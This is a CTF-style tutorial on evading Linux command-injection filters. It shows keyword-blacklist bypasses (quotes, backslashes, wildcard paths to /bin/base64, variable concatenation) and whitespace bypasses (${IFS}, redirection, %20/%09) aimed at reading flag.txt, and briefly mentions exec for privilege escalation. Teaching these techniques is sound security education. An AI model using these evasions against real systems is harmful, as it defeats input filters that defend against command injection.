Contents

Linux Command Execution Bypass

1 Comand execution bypass

1.1 Keyword Bypass

Bypassing keywords refers to the situation where a blacklist of keywords has been set up to prevent certain actions or commands on a host.

For instance, if cat command is filtered:

  • Substitute with similar functionality commands such as tac, more, less, curl, nl, tail, sort, strings, head, paste, od.

  • Employ quotation marks to circumvent the restriction.

    c'at' flag.txt
    c"at" flag.txt
    c``at flag.txt
    c\at flag.txt
    

Another example: When the keyword flag in file names is filtered:

  • Perform inline execution. Output the contents of all files in the current directory.

    cat `ls`
    
  • Bypass by using wildcards.

    # Printing all contents in the current directory
    cat *
    
    # Using the ? as a letter wildcard
    cat fl?g.txt
    
    # cat flag.txt
    /bin/c?t flag.txt
    
    # Opening flag.txt using base64
    /???/????64 ????.??? # /bin/base64 flag.txt
    
    # Opening flag.txt using bzip2
    /???/???/???2 ????.??? # /usr/bin/bzip2 flag.txt
    

    Wildcards do not match environment variables, they only search for matches in the current directory. Therefore, when bypassing system commands using wildcards, you should specify their absolute paths.

    # cat flag.txt
    /bin/c?t flag.txt
    
    # Opening flag.txt using base64
    /???/????64 ????.??? # /bin/base64 flag.txt
    
    # Opening flag.txt using bzip2
    /???/???/???2 ????.??? # /usr/bin/bzip2 flag.txt
    
  • Concatenation bypass

    Define two variables in the shell and use them together. Use ; to enter multiple commands on one line.

    # cat flag.txt
    a=fl;b=ag.txt;cat $a$b
    

1.2 Whitespace bypass

Whitespace bypass is applicable when the host has filtered whitespace.

  • IFS bypass

    There is a variable called internal field separator IFS (internal field separator) in the bash shell of Linux, which is often used as a separator when processing text data. IFS can be one or several of White Space (blank key), Tab (table key), and Enter (enter key).

    # IFS by default in zsh, tested on Arch Linux
    $ set | grep IFS
    IFS=$' \t\n\C-@'
    
    # IFS by default in bash, tested on Kali Linux
    $ set | grep IFS
    IFS=$' \t\n'
    

    Setting IFS is similar to that of ordinary variables: IFS=":". When the variable is or \t\n, etc., use IFS to bypass spaces.

    cat${IFS}flag.txt
    cat$IFS$9flag.txt
    cat<flag.txt
    cat<>flag.txt
    
  • %20 %09 bypass

2 Other useful tools for command execution

2.1 printf()

printf() can convert hexadecimal or octal character numbers into their corresponding ASCII character.

printf  format-string  [arguments...]

\NNN: ASCII code character represented by octal number NNN. \xHH : character corresponding to hexadecimal HH. \uHHHH : Unicode character corresponding to hexadecimal HHHH.

2.2 $() and \

In bash, use $( ) and \ to execute commands in brackets or backquotes to complete command substitution. Command substitution is similar to variable substitution. first execute the command in the quotes, then reorganize the execution result into a new command line for execution.

$ echo today is $(date "+%Y-%m-%d")
today is 2023-06-30

2.3 exec

In the shell, exec will replace the current shell process and execute the command directly in the current process. for example. In WSL, if you use the exec ls command, it will replace the WSL session process, and the entire WSL session will be replaced by the output of the exec ls command.

$ exec ls
code  project
PS C:\windows\system32> # WSL session process is replaced, returning to the Windows terminal

In the same way, using exec() in Linux can switch shells. A similar operation can be used for escalation of privileges in penetration testing. See future articles for more on privilege escalation.

# Replace process /bin/zsh with /bin/bash
➜  ~ echo $SHELL
/bin/zsh
➜  ~ exec /bin/bash
[root@bowendelg ~]
[root@bowendelg ~]echo $SHELL
/bin/bash